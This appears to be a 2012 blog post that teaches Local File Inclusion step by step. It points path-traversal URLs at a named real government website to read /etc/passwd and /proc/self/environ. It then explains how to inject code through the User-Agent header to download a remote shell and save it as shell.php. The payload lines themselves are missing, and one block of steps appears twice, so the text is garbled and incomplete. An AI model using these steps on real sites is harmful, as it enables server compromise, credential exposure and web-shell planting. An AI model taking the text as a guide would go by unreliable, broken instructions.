SEARCH

x

Monday, 18 June 2012

LFI ( Local File Inclusion ) Tutorial



REQUIREMENTS:

1) Site vulnerable to LFI
2) Remote shell ( http://www.yourhosting/urshell.txt)
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/)
4) Mozilla Firefox Browser

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents

Now make new user-agentGo to New > New User-Agent

Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.

Now search for "disable_functions" (Ctrl+F Search function)

Now go back and edit your User-Agent.
Change "User-Agent" to:

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php

No comments:

Post a Comment

Post a Comment